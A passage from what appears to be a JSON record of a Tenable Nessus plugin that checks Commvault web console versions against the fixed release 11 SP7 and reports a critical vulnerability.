value:\"cpe:/a:commvault:commvault\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"commvault_web_console_detect.nbin\");\n script_require_keys(\"installed_sw/Commvault\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\n# Can't detect hotfix\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80);\n\n# get_app_info wrapper converts version string to <version>-SP<service pack>\n# for ease of writing constraints\napp = vcf::commvault::get_webapp_info(port:port);\n\nconstraints = [{\"min_version\" : \"11\", \"fixed_version\" : \"11-SP7\", \"fixed_display\":\"11 SP6 & hotfix 590 / 11 SP7\"}];\n\nvcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE, strict:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}